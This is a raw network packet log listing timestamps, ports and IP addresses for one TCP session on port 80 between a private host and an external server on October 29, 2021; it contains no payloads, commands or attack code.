Oct 29, 2021 20:50:19.483386040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483412027 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483436108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483460903 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483479023 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483488083 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483511925 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483513117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483537912 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483562946 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483577013 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483587980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483613968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483637094 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483643055 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483663082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483664989 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483690977 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483714104 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483715057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483740091 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483761072 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.483762980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.483875036 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534502029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534531116 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534543991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534560919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534579039 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534595013 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534598112 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534606934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534653902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534657955 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534670115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534682035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534694910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534708023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534710884 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534764051 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534765959 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534794092 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534822941 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534841061 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534853935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534867048 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534879923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534883976 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534904003 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534912109 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.534923077 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534940958 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534955025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534974098 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.534998894 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535020113 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535022974 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535027981 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535032988 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535047054 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535048962 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535074949 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535090923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535119057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535181046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535196066 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535219908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535267115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535265923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535310984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535392046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535434961 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535461903 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535490990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535548925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535569906 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535609961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.535912991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535943985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535969973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.535994053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536004066 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536051989 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536091089 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536118984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536150932 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536174059 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536176920 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536201954 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536227942 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536245108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536273003 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536300898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536305904 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536346912 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536364079 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536391973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536418915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536446095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536458969 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536470890 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536497116 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536504984 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536555052 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.536875010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536902905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536927938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536952019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.536972046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537007093 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537501097 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537530899 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537553072 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537579060 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537585020 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537599087 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537623882 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537630081 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537651062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537673950 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537729025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537753105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537775040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537775040 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537796021 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537813902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537837982 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537838936 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537857056 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537862062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537889004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537909031 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537915945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537940979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537961006 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.537975073 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.537986040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538006067 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538007021 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538029909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538047075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538053989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538079977 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538100004 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538103104 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538126945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538144112 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538151979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538175106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538209915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538228989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538237095 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538253069 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538269043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538280010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538305044 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538311005 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538326979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538350105 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538353920 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538379908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538398981 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538420916 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538430929 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538444996 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538461924 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538467884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538489103 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538491964 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538512945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538531065 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538539886 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538563967 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538589001 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538590908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538615942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538634062 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538638115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538655996 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538697004 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538698912 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538724899 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538746119 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538752079 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538778067 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538804054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538809061 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538844109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538868904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538875103 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538896084 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538918018 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538933992 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538937092 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.538961887 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.538963079 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.539009094 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.539979935 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587013960 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587049961 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587073088 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587097883 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587117910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587151051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587171078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587177038 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587192059 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587212086 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587217093 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587234974 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587246895 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587258101 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587282896 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587292910 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587311029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587333918 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587335110 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587359905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587382078 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587384939 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587407112 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587430000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587431908 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587450027 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587471008 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587485075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587493896 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587515116 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587517023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587538958 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587573051 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587882996 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587909937 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587934971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587945938 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.587959051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587982893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.587987900 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588007927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588025093 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588031054 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588056087 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588074923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588076115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588098049 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588119030 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588121891 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588146925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588172913 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588172913 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588196039 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588217020 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588217974 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588241100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588263035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588263988 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588285923 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588301897 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588310957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588334084 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588350058 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588356972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588380098 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588397026 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588401079 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588440895 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588524103 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588546991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588567019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588589907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588593006 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588609934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588630915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588640928 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588653088 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588676929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588696003 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588700056 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588726044 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588743925 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588747025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588769913 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588769913 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588792086 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588809967 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588823080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588843107 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588874102 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588896036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588918924 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588936090 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588952065 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588968992 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.588979959 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.588994980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589016914 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589020014 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589041948 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589063883 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589067936 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589082956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589098930 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589122057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589134932 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589148045 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589169979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589171886 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589193106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589196920 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589242935 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589803934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589831114 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589850903 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589870930 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589884043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589891911 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589911938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.589911938 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.589953899 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591172934 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591202974 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591228008 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591249943 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591257095 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591275930 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591300964 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591305017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591331005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591357946 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591366053 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591382980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591412067 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591429949 CEST	49855	80	192.168.2.4	185.98.87.159
